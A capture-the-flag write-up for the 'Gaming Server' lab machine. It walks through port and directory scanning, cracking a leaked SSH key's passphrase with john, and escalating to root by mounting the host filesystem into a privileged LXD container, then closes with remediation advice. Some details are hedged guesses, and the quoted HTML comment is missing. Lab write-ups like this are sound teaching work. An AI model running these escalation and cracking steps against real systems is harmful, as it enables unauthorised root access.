Target IP: gamingserver.thm (Requires /etc/hosts entry) Difficulty: Medium (Easy if you know LXD) Objective: User (user.txt) & Root (root.txt) Flags

1. Executive Summary

“Gaming Server” is a Linux machine hosting a web page for a gaming community. Initial access is obtained by discovering a hidden RSA private key (secret.txt) via directory fuzzing. The key’s passphrase is cracked using a custom dictionary found on the server (dict.lst). A valid username (john) is discovered in an HTML comment source code leak. Privilege escalation exploits the user’s membership in the LXD group to mount the host’s root filesystem into a privileged container, bypassing all file permissions.

Key TTPs (MITRE ATT&CK):

  • T1595 (Active Scanning): Enumerating ports and web directories.
  • T1078 (Valid Accounts): Finding valid usernames in source code comments.
  • T1552 (Unsecured Credentials): Recovering RSA keys from hidden web directories.
  • T1110 (Brute Force): Cracking SSH key passphrases.
  • T1611 (Escape to Host): Exploiting LXD container privileges to access the host filesystem.

2. Operational Setup

Host Configuration

echo "10.10.x.x gamingserver.thm" | sudo tee -a /etc/hosts

3. Enumeration

A. Network Scanning

You performed a “half scan” (SYN scan).

nmap -sS -sC -sV -oA nmap/gaming gamingserver.thm

Results:

  • 22/tcp (SSH): OpenSSH.
  • 80/tcp (HTTP): Apache.

B. Web Enumeration

  1. Robots.txt: Checking /robots.txt revealed a directory uploads (or similar) containing files.
  • Downloaded: A dictionary list (dict.lst), a manifesto, and an image.
  • Analysis: The dictionary list is crucial for cracking.
  1. Fuzzing: Using ffuf or gobuster, you found a hidden file.
ffuf -u http://gamingserver.thm/uploads/FUZZ -w /usr/share/wordlists/dirb/common.txt

Result: secret.txt -> This turns out to be an OpenSSH Private Key. 3. Source Code Leak (Username): While Hydra failed (because we didn’t have the user yet), checking index.html source code revealed:

 

Username Found: john.


4. Initial Access: The SSH Key

A. Cracking the Key

The key (secret.txt) is encrypted. We need to crack the passphrase using the dictionary we found (dict.lst).

  1. Convert to Hash:
ssh2john secret.txt > key.hash
  1. Crack with John:
john --wordlist=dict.lst key.hash

Note: If dict.lst fails, falling back to rockyou.txt is the standard next step. Result: letmein (or similar).

B. Logging In

chmod 600 secret.txt
ssh -i secret.txt john@gamingserver.thm

Status: User john.


5. Privilege Escalation: LXD Group

Enumeration

Checking the user’s groups is the first step in Linux PrivEsc.

id
# uid=1000(john) gid=1000(john) groups=1000(john),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)

Critical Finding: 108(lxd).

The Vulnerability

Users in the lxd (or lxc) group can create and manage Linux Containers. A malicious user can create a privileged container and mount the entire host filesystem (/) into that container. From inside the container, the user can browse the host’s files as root.

Exploitation

You need an Alpine Linux image for LXD. Since the target machine has no internet or is slow, you build/download it locally and transfer it.

1. Prepare Image (Attacker Machine): You likely downloaded alpine-v3.13-x86_64.tar.gz and the metadata .tar.xz. (Or used the Distrobuilder tool).

2. Transfer & Import (Target Machine): Transfer the file to john’s home directory via SCP or Python server.

# Import the image
lxc image import ./alpine-v3.13-x86_64.tar.gz --alias myimage

3. Initialize & Configure: We create the container and add the “security.privileged=true” flag. This ensures the container’s root user maps to the host’s root user.

lxc init myimage mycontainer -c security.privileged=true

4. The Mount (The Kill Shot): We mount the host’s root (/) to /mnt/rootfs inside the container.

lxc config device add mycontainer mydevice disk source=/ path=/mnt/rootfs recursive=true

5. Execute: Start the container and spawn a shell.

lxc start mycontainer
lxc exec mycontainer /bin/sh

6. Root Access: Once inside the container:

cd /mnt/rootfs/root
ls
# root.txt

Note: You are technically inside the container, but since you mounted the host disk, you have full Read/Write access to the host’s files.


6. Remediation (Blue Team)

  1. Group Membership:
  • Treat the lxd group as Root. Do not add standard users to this group unless they absolutely require it and you accept the risk.
  • If users need to run containers, use Rootless Podman or configure restricted LXD profiles that prevent mounting sensitive paths.
  1. Web Security:
  • Comments: Remove developer comments containing usernames (john) from production HTML.
  • Hidden Files: Do not leave sensitive files (secret.txt, dictionaries) in accessible web directories (/uploads), even if “hidden” by obscurity.
  1. SSH Keys:
  • Encrypted SSH keys should have strong, complex passphrases. A passphrase found in a simple dictionary list (dict.lst) defeats the purpose of encryption.